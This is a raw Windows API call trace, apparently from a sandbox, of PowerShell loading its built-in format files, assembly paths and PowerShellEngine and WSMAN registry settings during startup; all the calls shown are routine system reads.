	[0286.574] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf23c2eef, Data2=0x642f, Data3=0x4b69, Data4=([0]=0xa2, [1]=0xb8, [2]=0x38, [3]=0x8f, [4]=0x5a, [5]=0x69, [6]=0x45, [7]=0x25))) returned 0x0
	[0286.575] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xb6e739e3, Data2=0x518e, Data3=0x4c91, Data4=([0]=0xa2, [1]=0xb6, [2]=0x23, [3]=0x58, [4]=0x3b, [5]=0x2b, [6]=0xc3, [7]=0x8c))) returned 0x0
	[0286.575] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.575] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xb69a1537, Data2=0x665, Data3=0x4abd, Data4=([0]=0x9f, [1]=0x3c, [2]=0xe7, [3]=0x45, [4]=0x4, [5]=0x4d, [6]=0xce, [7]=0x5))) returned 0x0
	[0286.575] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x17d4f930, Data2=0x5aa5, Data3=0x4d08, Data4=([0]=0xac, [1]=0x31, [2]=0x59, [3]=0x3f, [4]=0xac, [5]=0x8c, [6]=0xa2, [7]=0xff))) returned 0x0
	[0286.575] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.575] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.576] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.576] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.576] SetErrorMode (uMode=0x1) returned 0x1
	[0286.576] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0286.576] GetFileType (hFile=0x1c8) returned 0x1
	[0286.576] SetErrorMode (uMode=0x1) returned 0x1
	[0286.576] GetFileType (hFile=0x1c8) returned 0x1
	[0286.576] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x8b4, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c7ee4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7ee4*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x31c8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x31c8ac8*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.577] CloseHandle (hObject=0x1c8) returned 1
	[0286.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.578] SetErrorMode (uMode=0x1) returned 0x1
	[0286.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0286.578] SetErrorMode (uMode=0x1) returned 0x1
	[0286.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.578] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1c8) returned 0x0
	[0286.578] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0286.578] CoTaskMemAlloc (cb=0x5a) returned 0x2dde70
	[0286.578] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2dde70, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0286.578] CoTaskMemFree (pv=0x2dde70) 
	[0286.578] RegCloseKey (hKey=0x1c8) returned 0x0
	[0286.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.579] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1a216bba, Data2=0x97b9, Data3=0x4057, Data4=([0]=0x80, [1]=0x99, [2]=0xf4, [3]=0x83, [4]=0xd0, [5]=0xa2, [6]=0xa7, [7]=0xa))) returned 0x0
	[0286.579] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4e884ded, Data2=0xa8f, Data3=0x4d41, Data4=([0]=0x86, [1]=0x76, [2]=0xe9, [3]=0xd, [4]=0xda, [5]=0xb4, [6]=0x79, [7]=0x36))) returned 0x0
	[0286.579] SetErrorMode (uMode=0x1) returned 0x1
	[0286.580] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0286.580] GetFileType (hFile=0x1c8) returned 0x1
	[0286.580] SetErrorMode (uMode=0x1) returned 0x1
	[0286.580] GetFileType (hFile=0x1c8) returned 0x1
	[0286.580] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.580] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.580] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.580] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.581] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0xe98, lpOverlapped=0x0) returned 1
	[0286.581] ReadFile (in: hFile=0x1c8, lpBuffer=0x3205eb0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3205eb0*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.581] ReadFile (in: hFile=0x1c8, lpBuffer=0x32068b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32068b0*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0286.581] CloseHandle (hObject=0x1c8) returned 1
	[0286.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.581] SetErrorMode (uMode=0x1) returned 0x1
	[0286.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0286.581] SetErrorMode (uMode=0x1) returned 0x1
	[0286.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.582] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1c8) returned 0x0
	[0286.582] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0286.582] CoTaskMemAlloc (cb=0x5a) returned 0x2dde70
	[0286.582] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2dde70, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0286.582] CoTaskMemFree (pv=0x2dde70) 
	[0286.582] RegCloseKey (hKey=0x1c8) returned 0x0
	[0286.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.582] VirtualQuery (in: lpAddress=0x16bd20, lpBuffer=0x16cbe0, dwLength=0x30 | out: lpBuffer=0x16cbe0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.583] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x797da6de, Data2=0x613, Data3=0x47d0, Data4=([0]=0x8a, [1]=0x44, [2]=0xca, [3]=0xcb, [4]=0xaf, [5]=0x2a, [6]=0x78, [7]=0x2f))) returned 0x0
	[0286.583] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf07bdce6, Data2=0x2c69, Data3=0x404d, Data4=([0]=0x8c, [1]=0x2b, [2]=0xa6, [3]=0x7c, [4]=0x1c, [5]=0xb2, [6]=0x4, [7]=0xc1))) returned 0x0
	[0287.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.997] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0287.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.997] CoTaskMemFree (pv=0x2ca2e0) 
	[0287.999] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0287.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.999] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.000] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.000] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.002] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.002] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.009] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.009] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.014] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.014] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.016] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.016] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.020] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d498 | out: phkResult=0x16d498*=0x1c8) returned 0x0
	[0288.021] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d39c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d398*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.021] CoTaskMemFree (pv=0x0) 
	[0288.022] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.022] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x262650, lpcchValueName=0x16d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.022] CoTaskMemFree (pv=0x262650) 
	[0288.022] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.022] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x262650, lpcchValueName=0x16d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.022] CoTaskMemFree (pv=0x262650) 
	[0288.022] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.022] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x262650, lpcchValueName=0x16d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.022] CoTaskMemFree (pv=0x262650) 
	[0288.022] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x8) returned 0x0
	[0288.022] CoTaskMemAlloc (cb=0xc) returned 0x2d7380
	[0288.023] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2d7380, lpcbData=0x16d3f8*=0x8 | out: lpType=0x16d3fc*=0x1, lpData="2.0", lpcbData=0x16d3f8*=0x8) returned 0x0
	[0288.023] CoTaskMemFree (pv=0x2d7380) 
	[0288.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3e8 | out: phkResult=0x16d3e8*=0x1d0) returned 0x0
	[0288.720] RegQueryInfoKeyW (in: hKey=0x1d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d2ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d2e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d2ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d2e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.720] CoTaskMemFree (pv=0x0) 
	[0288.720] CoTaskMemAlloc (cb=0x204) returned 0x262650
